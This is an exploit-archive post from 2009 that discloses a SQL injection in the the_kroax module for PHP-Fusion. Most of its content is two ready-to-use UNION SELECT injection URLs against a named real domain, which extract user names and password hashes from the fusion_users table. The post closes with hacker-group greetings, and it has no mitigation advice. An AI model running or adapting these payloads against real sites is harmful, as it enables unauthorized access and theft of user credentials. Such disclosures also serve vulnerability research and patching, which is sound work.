[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability
# Published : 2009-01-11
# Author : FasTWORM
# Previous Title : Weight Loss Recipe Book 3.1 (Auth Bypass) SQL Injection Vuln
# Next Title : Social Engine (browse_classifieds.php s) SQL Injection Vulnerability
PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability
-----------------------------------------------------------------------------------------------------------
[+]Author by : FasTWORM
[+]home: Cyber-Warrior.Org
[+]exploit:
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_name,5,6,1905+from+fusion_users/*
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_password,5,6,1905+from+fusion_users/*
----------------------------------------------------------------------------------------------------------------------
[+]Greetz : BackDooR , Tr-ShaRk , All CW Users
[+]Note : Bugun Do??um G??n??m :)
----------------------------------------------------------------------------------------------------------------------
# www.Syue.com [2009-01-11]